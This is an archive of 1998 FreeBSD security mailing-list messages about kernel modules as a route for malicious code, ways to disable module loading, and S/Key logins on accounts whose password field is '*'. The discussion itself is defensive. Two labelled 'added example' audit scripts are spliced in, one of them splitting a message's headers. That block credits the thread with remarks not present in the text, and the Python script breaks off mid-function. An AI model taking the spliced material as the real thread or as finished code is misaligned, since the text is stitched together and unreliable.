Received: from gateman.zeus.leitch.com (gateman.zeus.leitch.com [204.187.61.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA07454 for ; Thu, 21 May 1998 12:20:34 -0700 (PDT) (envelope-from woods@tap.zeus.leitch.com)
Received: from zeus.leitch.com (tap.zeus.leitch.com [204.187.61.10]) by gateman.zeus.leitch.com (8.8.5/8.7.3/1.0) with ESMTP id PAA01368; Thu, 21 May 1998 15:13:57 -0400 (EDT)
Received: from brain.zeus.leitch.com (brain.zeus.leitch.com [204.187.61.32]) by zeus.leitch.com (8.7.5/8.7.3/1.0) with ESMTP id PAA03785; Thu, 21 May 1998 15:13:59 -0400 (EDT)
Received: (from woods@localhost) by brain.zeus.leitch.com (8.8.8/8.8.8) id PAA23207; Thu, 21 May 1998 15:13:58 -0400 (EDT) (envelope-from woods@tap.zeus.leitch.com)
Date: Thu, 21 May 1998 15:13:58 -0400 (EDT)
Message-Id: <199805211913.PAA23207@brain.zeus.leitch.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
From: woods@zeus.leitch.com (Greg A. Woods)
To: Emmanuel Gravel
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Virus on FreeBSD
In-Reply-To: Emmanuel Gravel's message of "Thu, May 21, 1998 09:38:00 -0700" regarding "Re: Virus on FreeBSD" id <3563F5F8.2CD24754@elr346.ateng.az.honeywell.com>
References: <199805210018.RAA04596@passer.osg.gov.bc.ca> <199805210149.LAA25157@frenzy.ct> <199805211431.KAA17444@brain.zeus.leitch.com> <3563F5F8.2CD24754@elr346.ateng.az.honeywell.com>
X-Mailer: VM 6.45 under Emacs 20.2.1
Reply-To: freebsd-security@FreeBSD.ORG
Organization: Planix, Inc.; Toronto, Ontario; Canada
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

[ On Thu, May 21, 1998 at 09:38:00 (-0700), Emmanuel Gravel wrote: ]
> Subject: Re: Virus on FreeBSD
>
> > A "published" LKM that can do the most nasty things was in the Phrack
> > newsletter issue #51.
> > 
> Thanks for the info. I'm trying to get the info from Phrack #51 on
> 2600.com but nothing seems to point to LKM's yet. Do you have any info
> on which article it could be in? If it's in that one at all?

Ah!  You want phrack.com instead!  The article I refer to is "Bypassing
Integrity Checking Systems" and was written by halflife, and can be found
in their archives section.

-- 
Greg A. Woods
+1 416 443-1734 VE3TCP
Planix, Inc. ; Secrets of the Weird

From owner-freebsd-security Thu May 21 12:24:51 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA08287 for freebsd-security-outgoing; Thu, 21 May 1998 12:24:51 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from shell.firehouse.net (qmailr@shell.firehouse.net [209.42.203.45]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id MAA08235 for ; Thu, 21 May 1998 12:24:25 -0700 (PDT) (envelope-from brian@shell.firehouse.net)
Received: (qmail 2338 invoked by uid 113); 21 May 1998 19:24:11 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 21 May 1998 19:24:11 -0000
Date: Thu, 21 May 1998 15:24:10 -0400 (EDT)
From: Brian Mitchell
To: Philippe Regnauld
cc: freebsd-security@FreeBSD.ORG
Subject: Re: Virus on FreeBSD
In-Reply-To: <19980521181555.59333@deepo.prosa.dk>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

On Thu, 21 May 1998, Philippe Regnauld wrote:

> Greg A. Woods writes:
> 
> > Anyone who's read that article and has even the tiniest amount of
> > imagination would *NEVER* run LKMs on a production machine.  Sure
> 
>     BTW, is there a mechanism to disable loading of LKMs ?
>     (of course, removing the modload command is one way) -- I was
>     thinking about something that looked at the securelevel
>     and refused to load/unload a module depending on it.

lkm doesn't work in securelevel 1+ i believe.

From owner-freebsd-security Thu May 21 13:11:22 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA19123 for freebsd-security-outgoing; Thu, 21 May 1998 13:11:22 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA19085 for ; Thu, 21 May 1998 13:10:52 -0700 (PDT) (envelope-from roberto@keltia.freenix.fr)
Received: (from uucp@localhost) by frmug.org (8.9.0.Beta7/frmug-2.3/nospam) with UUCP id WAA27025 for freebsd-security@FreeBSD.ORG; Thu, 21 May 1998 22:10:43 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr)
Received: (from roberto@localhost) by keltia.freenix.fr (8.9.0.Beta4/keltia-2.14/nospam) id UAA16309 for freebsd-security@FreeBSD.ORG; Thu, 21 May 1998 20:41:02 +0200 (CEST) (envelope-from roberto)
Message-ID: <19980521204101.A16263@keltia.freenix.fr>
Date: Thu, 21 May 1998 20:41:01 +0200
From: Ollivier Robert
To: freebsd-security@FreeBSD.ORG
Subject: Re: Virus on FreeBSD
Mail-Followup-To: freebsd-security@FreeBSD.ORG
References: <199805210018.RAA04596@passer.osg.gov.bc.ca> <199805210149.LAA25157@frenzy.ct> <199805211431.KAA17444@brain.zeus.leitch.com> <19980521181555.59333@deepo.prosa.dk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.92.3i
In-Reply-To: <19980521181555.59333@deepo.prosa.dk>; from Philippe Regnauld on Thu, May 21, 1998 at 06:15:55PM +0200
X-Operating-System: FreeBSD 3.0-CURRENT ctm#4308 AMD-K6 MMX @ 225 MHz
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

According to Philippe Regnauld:
>     BTW, is there a mechanism to disable loading of LKMs ?

Try compiling your kernel with "options NO_LKM".

-- 
Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 3.0-CURRENT #60: Fri May 15 21:04:22 CEST 1998

From owner-freebsd-security Thu May 21 13:20:51 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA20511 for freebsd-security-outgoing; Thu, 21 May 1998 13:20:51 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA20481 for ; Thu, 21 May 1998 13:20:39 -0700 (PDT) (envelope-from cschuber@passer.osg.gov.bc.ca)
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.8.8/8.6.10) id NAA08312; Thu, 21 May 1998 13:20:24 -0700 (PDT)
Message-Id: <199805212020.NAA08312@passer.osg.gov.bc.ca>
Received: from localhost(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost, id smtpdaajsoa; Thu May 21 13:20:15 1998
X-Mailer: exmh version 2.0gamma 1/27/96
Reply-to: Cy Schubert - ITSD Open Systems Group
X-Sender: cschuber
To: Keith Stevenson
cc: freebsd-security@FreeBSD.ORG
Subject: Re: LKMs (Was: Virus on FreeBSD)
In-reply-to: Your message of "Thu, 21 May 1998 11:16:53 EDT." <19980521111653.A9283@homer.louisville.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 21 May 1998 13:19:54 -0700
From: Cy Schubert - ITSD Open Systems Group
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

> Ok, I'll buy off on the idea that LKMs can be bad from a security standpoint.
> How does one go about removing that functionality from the system?

options NO_LKM

then rebuild your kernel

[I posted a similar comment to this list last night, however I've seen no
trace of it -- hopefully this is not a dup for any of you.]

Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Open Systems Group          Internet:  cschuber@uumail.gov.bc.ca
ITSD                                   Cy.Schubert@gems8.gov.bc.ca
Government of BC

From owner-freebsd-security Thu May 21 17:03:19 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA03960 for freebsd-security-outgoing; Thu, 21 May 1998 17:03:19 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from wumpus.its.uow.edu.au (wumpus.its.uow.edu.au [130.130.68.12]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA03885 for ; Thu, 21 May 1998 17:02:51 -0700 (PDT) (envelope-from ncb05@uow.edu.au)
Received: from banshee.cs.uow.edu.au (ncb05@banshee.cs.uow.edu.au [130.130.188.1]) by wumpus.its.uow.edu.au (8.9.0.Beta5/8.9.0.Beta5) with SMTP id KAA25995 for ; Fri, 22 May 1998 10:02:46 +1000 (EST)
Date: Fri, 22 May 1998 10:02:46 +1000 (EST)
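An added example, not code from any of the posters in this thread: a small sh audit that checks the two controls the replies above name, the securelevel rule that Dima Ruban and Brian Mitchell cite (no module loading once kern.securelevel is above 0; the sysctl name is mine, the thread only says "secure level") and the "options NO_LKM" kernel option that Greg Woods, Ollivier Robert and Cy Schubert recommend. The kernel config contents and securelevel values below are constructed for the demo; on a real host you would point it at your own config under /sys/i386/conf (the LINT path Greg Woods gives) and at the output of sysctl -n kern.securelevel. The grep deliberately ignores a commented-out "#options NO_LKM" line so that the check cannot report a kernel as hardened when the option was never compiled in.

```shell
#!/bin/sh
# Added example (not from the list thread): audit whether loadable kernel
# module loading is blocked, using the two controls the thread names:
#   - kern.securelevel > 0 at runtime, which stops modload, and
#   - "options NO_LKM" compiled into the kernel configuration.
# Config files and securelevel values here are constructed for the demo;
# on a real host pass /sys/i386/conf/<KERNEL> and `sysctl -n kern.securelevel`.

# kernel_has_no_lkm FILE: succeed if an active (uncommented) "options NO_LKM"
# line is present; a line commented out with '#' does not count.
kernel_has_no_lkm() {
    grep -Eq '^[[:space:]]*options[[:space:]]+"?NO_LKM"?([[:space:]]|$)' "$1"
}

# lkm_blocked FILE SECURELEVEL: return 0 if either control blocks loading,
# 1 if the kernel still accepts modules, 2 if SECURELEVEL is not an integer.
lkm_blocked() {
    cfg=$1
    level=$2
    case "$level" in
        ''|*[!0-9-]*) echo "lkm_blocked: bad securelevel '$level'" >&2; return 2 ;;
    esac
    kernel_has_no_lkm "$cfg" && return 0
    [ "$level" -gt 0 ] && return 0
    return 1
}

# lkm_report FILE SECURELEVEL: print which control applies, or OPEN.
lkm_report() {
    if kernel_has_no_lkm "$1"; then
        echo "compiled-out (options NO_LKM)"
    elif lkm_blocked "$1" "$2"; then
        echo "securelevel $2 (module loading refused at runtime)"
    else
        echo "OPEN: securelevel $2 and no NO_LKM option"
    fi
}

# Constructed sample kernel configs (not real system files).
tmpdir=$(mktemp -d)
trap 'rm -rf "$tmpdir"' EXIT
cat > "$tmpdir/HARDENED" <<'EOF'
# constructed kernel config fragment with modules compiled out
machine         "i386"
ident           HARDENED
options         NO_LKM
EOF
cat > "$tmpdir/GENERIC" <<'EOF'
# constructed kernel config fragment: NO_LKM appears only in a comment
machine         "i386"
ident           GENERIC
#options        NO_LKM
EOF

for level in -1 0 1; do
    echo "HARDENED level=$level: $(lkm_report "$tmpdir/HARDENED" "$level")"
    echo "GENERIC  level=$level: $(lkm_report "$tmpdir/GENERIC" "$level")"
done
```

Note that securelevel -1 (permanently insecure) is treated like 0: only a positive level, or the compiled-in option, counts as a block. The thread itself later adds the version caveat that 2.1.7.1's LINT does not list NO_LKM at all, so on such a release only the securelevel check applies.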
From: Nicholas Charles Brawn
X-Sender: ncb05@banshee.cs.uow.edu.au
To: freebsd-security@FreeBSD.ORG
Subject: Re: Virus on FreeBSD
In-Reply-To: <199805211431.KAA17444@brain.zeus.leitch.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

On Thu, 21 May 1998, Greg A. Woods wrote:

> [ On Thu, May 21, 1998 at 11:19:29 (+0930), Mark Newton wrote: ]
> > Subject: Re: Virus on FreeBSD
> >
> > LKMs open vast new vistas of potential for viruses, btw.  I attended a
> > series of seminars given my Kirk some number of years ago, where he
> > said the decision to avoid expending development time on LKMs for 4.4BSD
> > was partly motivated by the security concerns raised by the ability to
> > move executable code from user-space (i.e.: the filesystem) into the
> > kernel.  Mitnick's SunOS "tap" streams module is but one example :-)
> 
> A "published" LKM that can do the most nasty things was in the Phrack
> newsletter issue #51.
> 
> Anyone who's read that article and has even the tiniest amount of
> imagination would *NEVER* run LKMs on a production machine.  Sure
> they're a great tool for doing OS development and experimentation at the
> lowest levels, but they're more dangerous in a production environment
> than not even having a root password in the first place (at least with
> the latter you *know* your security is blown).
> 
> (And that's just one reason never to run SunOS-5 in production!  ;-)
> 
> I'd love to have a "virus" scanner that could detect the signature of a
> LKM module or the LKM loader in a kernel.  Of course by "signature" here
> I mean something that would recognize the style of code necessary to
> perform this operation, not the specific sequence of bits in any given
> implementation.

You may have a point here. Is there any way you could "sign" a module to
ensure its authenticity? And on top of that build in an automatic
authentication system within the kernel that rejects lkm's that are not
signed? Perhaps this could be included so as to be performed at one of the
securelevels?

> 
> -- 
> Greg A. Woods
> 
> +1 416 443-1734 VE3TCP
> Planix, Inc. ; Secrets of the Weird
> 

Nick

-- 
Email: ncb05@uow.edu.au - DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A
http://rabble.uow.edu.au/~nick - public key available on request.
Nicholas Brawn - Computer Science Undergraduate, University of Wollongong.

From owner-freebsd-security Thu May 21 17:06:14 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA04746 for freebsd-security-outgoing; Thu, 21 May 1998 17:06:14 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA04633 for ; Thu, 21 May 1998 17:05:49 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.8.8/8.8.8) id UAA00936; Thu, 21 May 1998 20:05:20 -0400 (EDT) (envelope-from wollman)
Date: Thu, 21 May 1998 20:05:20 -0400 (EDT)
From: Garrett Wollman
Message-Id: <199805220005.UAA00936@khavrinen.lcs.mit.edu>
To: Philippe Regnauld
Cc: freebsd-security@FreeBSD.ORG
Subject: SKey and locked account
In-Reply-To: <19980521183148.07894@deepo.prosa.dk>
References: <19980521183148.07894@deepo.prosa.dk>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

< said:

>     1) First thing I noticed is that it's possible for someone to log
>     into the system, even if the account is disabled ('*' in the
>     passwd field), when S/Key is enabled for that user.

Having an invalid password in the password file doesn't mean that the
account is disabled; it just means that that user can't use a plain-text
password to log in.  Several of us have invalid passwords on freefall
since we always use an alternative authentication mechanism like S/Key.

It might not be a bad idea to use the login class mechanism to define a
specific class meaning ``disabled'' -- as distinguished from the
``account expired'' we can already represent in master.passwd.

-GAWollman

-- 
Garrett A. Wollman    | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu   | O Siem / The fires of freedom
Opinions not those of | Dance in the burning flame
MIT, LCS, CRS, or NSA |                     - Susan Aglukark and Chad Irschick

From owner-freebsd-security Thu May 21 17:43:21 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA13614 for freebsd-security-outgoing; Thu, 21 May 1998 17:43:21 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from antipodes.cdrom.com (castles145.castles.com [208.214.165.145]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA13432 for ; Thu, 21 May 1998 17:42:28 -0700 (PDT) (envelope-from mike@antipodes.cdrom.com)
Received: from antipodes.cdrom.com (localhost [127.0.0.1]) by antipodes.cdrom.com (8.8.8/8.8.5) with ESMTP id QAA05467; Thu, 21 May 1998 16:38:30 -0700 (PDT)
Message-Id: <199805212338.QAA05467@antipodes.cdrom.com>
X-Mailer: exmh version 2.0zeta 7/24/97
To: Philippe Regnauld
cc: freebsd-security@FreeBSD.ORG
Subject: Re: SKey and locked account
In-reply-to: Your message of "Thu, 21 May 1998 18:31:48 +0200." <19980521183148.07894@deepo.prosa.dk>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Date: Thu, 21 May 1998 16:38:30 -0700
From: Mike Smith
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by hub.freebsd.org id RAA13455
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

>     I'm currently experimenting with 2.2.6, FWTK and skey.
> 
>     1) First thing I noticed is that it's possible for someone to log
>     into the system, even if the account is disabled ('*' in the
>     passwd field), when S/Key is enabled for that user.
> 
>     Surprise to me.

"*" does not disable an account - it is an invalid crypted string which
will fail to match any crypted plaintext password, as used by login,
the r* commands and ftp (when FTP is not using s/key).

If you wish to disable a user's account, you should set their shell to
something nonexistent.  (Note that ssh may still be a way past this.)

-- 
\\  Sometimes you're ahead,       \\  Mike Smith
\\  sometimes you're behind.      \\  mike@smith.net.au
\\  The race is long, and in the  \\  msmith@freebsd.org
\\  end it's only with yourself.  \\  msmith@cdrom.com

From owner-freebsd-security Thu May 21 19:45:40 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA07955 for freebsd-security-outgoing; Thu, 21 May 1998 19:45:40 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from wumpus.its.uow.edu.au (wumpus.its.uow.edu.au [130.130.68.12]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA07938 for ; Thu, 21 May 1998 19:45:29 -0700 (PDT) (envelope-from ncb05@uow.edu.au)
Received: from wumpus.its.uow.edu.au (wumpus.its.uow.edu.au [130.130.68.12]) by wumpus.its.uow.edu.au (8.9.0.Beta5/8.9.0.Beta5) with SMTP id MAA21043; Fri, 22 May 1998 12:45:18 +1000 (EST)
Date: Fri, 22 May 1998 12:45:18 +1000 (EST)
From: Nicholas Charles Brawn
X-Sender: ncb05@wumpus.its.uow.edu.au
To: Emmanuel Gravel
cc: freebsd-security@FreeBSD.ORG
Subject: Re: Virus on FreeBSD
In-Reply-To: <3563F5F8.2CD24754@elr346.ateng.az.honeywell.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

On Thu, 21 May 1998, Emmanuel Gravel wrote:

> > A "published" LKM that can do the most nasty things was in the Phrack
> > newsletter issue #51.
> > 
> Thanks for the info. I'm trying to get the info from Phrack #51 on
> 2600.com but nothing seems to point to LKM's yet. Do you have any info
> on which article it could be in? If it's in that one at all?

Try Phrack's official website at www.phrack.com. You will need to untar/gz
the phrack51.tar.gz and view P51-01 to see which particular file the
article is in. And btw, 2600 isn't affiliated with Phrack.

> 
> cu l8r!
> 
> Emmanuel Gravel
> egravel@elr346.ateng.az.honeywell.com
> 

Nick

-- 
Email: ncb05@uow.edu.au - DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A
http://rabble.uow.edu.au/~nick - public key available on request.
Nicholas Brawn - Computer Science Undergraduate, University of Wollongong.

From owner-freebsd-security Thu May 21 20:23:04 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA13532 for freebsd-security-outgoing; Thu, 21 May 1998 20:23:04 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from parsons.rh.rit.edu (d117-h041.rh.rit.edu [129.21.117.169]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id UAA13527 for ; Thu, 21 May 1998 20:22:55 -0700 (PDT) (envelope-from mfisher@harborcom.net)
Received: from mfisher by parsons.rh.rit.edu with smtp (Exim 1.82 #1) id 0yciPw-000143-00; Thu, 21 May 1998 23:22:48 -0400
Date: Thu, 21 May 1998 23:22:48 -0400 (EDT)
From: Mike Fisher
X-Sender: mfisher@d117-h041.rh.rit.edu
Reply-To: Mike Fisher
To: freebsd-security@FreeBSD.ORG
Subject: Re: SKey and locked account
In-Reply-To: <199805212338.QAA05467@antipodes.cdrom.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

On Thu, 21 May 1998, Mike Smith wrote:

> If you wish to disable a user's account, you should set their shell to
> something nonexistent.  (Note that ssh may still be a way past this.)

As is the login.conf(5) database, from what I can tell.  If the disabled
user drops in a .login_conf that sets the shell, it will work although
they will need to modify their SHELL environmental variable if they're
going to be doing much fun stuff.

However, I just did some playing around with this on a 2.2.6-STABLE system
and didn't seem to have any luck subverting the configured shell.  (Read:
assuming I configure .login_conf correctly, it is not being used
correctly.)

Setting the shell to /sbin/nologin does seem to do the trick; it doesn't
let S/Key through and it doesn't seem to allow anything else through.

With SSH, I was unable to do a login via RSA keys or password
authentication with the shell set to /sbin/nologin.  I'd assume that the
.shosts authentication would also be effectively broken.

Of course, this is an inelegant fix for people who have set up a nice
shell substitute that allows choices like password changes or whatnot, but
I would imagine that in a situation where the account was locked, a
password change is a minimal priority for people.

-- 
Mike

"I swear - by my life and by my love of it - that I will never live for
the sake of another man, nor ask another man to live for mine."
                                         --Ayn Rand, _Atlas Shrugged_

From owner-freebsd-security Thu May 21 21:00:25 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA19434 for freebsd-security-outgoing; Thu, 21 May 1998 21:00:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from antipodes.cdrom.com (castles145.castles.com [208.214.165.145]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA19423 for ; Thu, 21 May 1998 21:00:15 -0700 (PDT) (envelope-from mike@antipodes.cdrom.com)
Received: from antipodes.cdrom.com (localhost [127.0.0.1]) by antipodes.cdrom.com (8.8.8/8.8.5) with ESMTP id TAA06636; Thu, 21 May 1998 19:56:16 -0700 (PDT)
Message-Id: <199805220256.TAA06636@antipodes.cdrom.com>
X-Mailer: exmh version 2.0zeta 7/24/97
To: Mike Fisher
cc: freebsd-security@FreeBSD.ORG
Subject: Re: SKey and locked account
In-reply-to: Your message of "Thu, 21 May 1998 23:22:48 EDT."
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 21 May 1998 19:56:16 -0700
From: Mike Smith
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

> On Thu, 21 May 1998, Mike Smith wrote:
> 
> > If you wish to disable a user's account, you should set their shell to
> > something nonexistent.  (Note that ssh may still be a way past this.)
> 
> As is the login.conf(5) database, from what I can tell.  If the disabled
> user drops in a .login_conf that sets the shell, it will work although
> they will need to modify their SHELL environmental variable if they're
> going to be doing much fun stuff.
> 
> However, I just did some playing around with this on a 2.2.6-STABLE system
> and didn't seem to have any luck subverting the configured shell.  (Read:
> assuming I configure .login_conf correctly, it is not being used
> correctly.)

from login.conf(5)

     In FreeBSD, users may individually create a file called .login_conf in
     their home directory using the same format, consisting of a single entry
     with a record id of "me".  If present, this file is used by login(1) to
     set user-defined environment settings which override those specified in
     the system login capabilities database.  Only a subset of login
     capabilities may be overridden, typically those which do not involve
     authentication, resource limits and accounting.

In addition, the 'shell' capability seems to be unimplemented.  8(

> With SSH, I was unable to do a login via RSA keys or password
> authentication with the shell set to /sbin/nologin.  I'd assume that the
> .shosts authentication would also be effectively broken.

That's bad, and effectively a bug in ssh.

-- 
\\  Sometimes you're ahead,       \\  Mike Smith
\\  sometimes you're behind.      \\  mike@smith.net.au
\\  The race is long, and in the  \\  msmith@freebsd.org
\\  end it's only with yourself.  \\  msmith@cdrom.com

From owner-freebsd-security Fri May 22 01:14:57 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA03720 for freebsd-security-outgoing; Fri, 22 May 1998 01:14:57 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from firewall.ftf.dk (root@mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA03510 for ; Fri, 22 May 1998 01:13:47 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk)
Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id MAA17535; Fri, 22 May 1998 12:13:54 +0200
Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id KAA22054; Fri, 22 May 1998 10:38:04 +0200 (CEST)
Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.7/8.8.5/prosa-1.1) id KAA17390; Fri, 22 May 1998 10:12:15 +0200 (CEST)
Message-ID: <19980522101215.41390@deepo.prosa.dk>
Date: Fri, 22 May 1998 10:12:15 +0200
From: Philippe Regnauld
To: Mike Smith
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: SKey and locked account
References: <19980521183148.07894@deepo.prosa.dk> <199805212338.QAA05467@antipodes.cdrom.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Mailer: Mutt 0.88e
In-Reply-To: <199805212338.QAA05467@antipodes.cdrom.com>; from Mike Smith on Thu, May 21, 1998 at 04:38:30PM -0700
X-Operating-System: FreeBSD 2.2.5-STABLE i386
Organization: PROSA
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

Mike Smith writes:
> >     I'm currently experimenting with 2.2.6, FWTK and skey.
> > 
> >     1) First thing I noticed is that it's possible for someone to log
> >     into the system, even if the account is disabled ('*' in the
> >     passwd field), when S/Key is enabled for that user.
> > 
> >     Surprise to me.
> 
> "*" does not disable an account - it is an invalid crypted string which
> will fail to match any crypted plaintext password, as used by login,
> the r* commands and ftp (when FTP is not using s/key).

    Ok -- just referring to the man page:

     The password field is the encrypted form of the password.  If the
     password field is empty, no password will be required to gain access to
     the machine.  This is almost invariably a mistake.  Because these files
     contain the encrypted user passwords, they should not be readable by
     anyone without appropriate privileges.  Administrative accounts have a
     password field containing an asterisk `*' which disallows normal logins.

    ... it doesn't mention the fact that they _also_ have an invalid shell.

-- 
-[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
«Pluto placed his bad dog at the entrance of Hades to keep the dead
IN and the living OUT! The archetypical corporate firewall?»
                                                   - S. Kelly Bootle

From owner-freebsd-security Fri May 22 01:24:31 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA06480 for freebsd-security-outgoing; Fri, 22 May 1998 01:24:31 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from firewall.ftf.dk (root@mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA06470 for ; Fri, 22 May 1998 01:24:24 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk)
Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id MAA17560; Fri, 22 May 1998 12:25:02 +0200
Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id KAA22076; Fri, 22 May 1998 10:49:12 +0200 (CEST)
Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.7/8.8.5/prosa-1.1) id KAA17475; Fri, 22 May 1998 10:23:23 +0200 (CEST)
Message-ID: <19980522102323.48197@deepo.prosa.dk>
Date: Fri, 22 May 1998 10:23:23 +0200
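An added example, not code from the list thread: a Python audit over a master.passwd(5) file that applies the distinction Garrett Wollman and Mike Smith draw in this "SKey and locked account" exchange. A '*' password field only defeats password authentication (login, the r* commands, ftp), so an S/Key enrolment still gets the user in; what actually blocks the session is the shell, either nonexistent, as Mike Smith advises, or /sbin/nologin, which Mike Fisher found also stops S/Key and ssh. The audit flags accounts whose password field is '*' but which are S/Key-enrolled and still have a working shell, and accounts with an empty password field (the passwd(5) text Philippe Regnauld quotes calls that "almost invariably a mistake"). Assumptions not taken from the thread: the 10-field BSD master.passwd layout, a skeykeys-style enrolment file whose first token per line is the login name, and an INSTALLED_SHELLS set standing in for an existence check of the shell path on the host. All sample data is constructed.

```python
"""Added example (not from the FreeBSD list thread): classify master.passwd
accounts by what, if anything, really blocks login.

Assumptions not stated on the page: master.passwd uses the 10-field layout
name:password:uid:gid:class:change:expire:gecos:home:shell; S/Key enrolment
is listed one user per line in a skeykeys-style file whose first token is
the login name; INSTALLED_SHELLS stands in for os.path.exists() on a host.
"""
from dataclasses import dataclass

# Shells that exist but refuse to start a session (Mike Fisher's /sbin/nologin).
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}

# Constructed stand-in for "does this shell binary exist on the host".
INSTALLED_SHELLS = {"/bin/sh", "/bin/csh", "/sbin/nologin"}


@dataclass
class Account:
    name: str
    password: str
    shell: str
    skey: bool
    state: str       # open | no-password | password-locked | shell-locked | shell-missing
    reachable: bool  # True if at least one login path still yields a session


def parse_master_passwd(text):
    """Yield (name, password, shell) for each non-comment master.passwd line."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 10:
            raise ValueError("unexpected master.passwd line: %r" % line)
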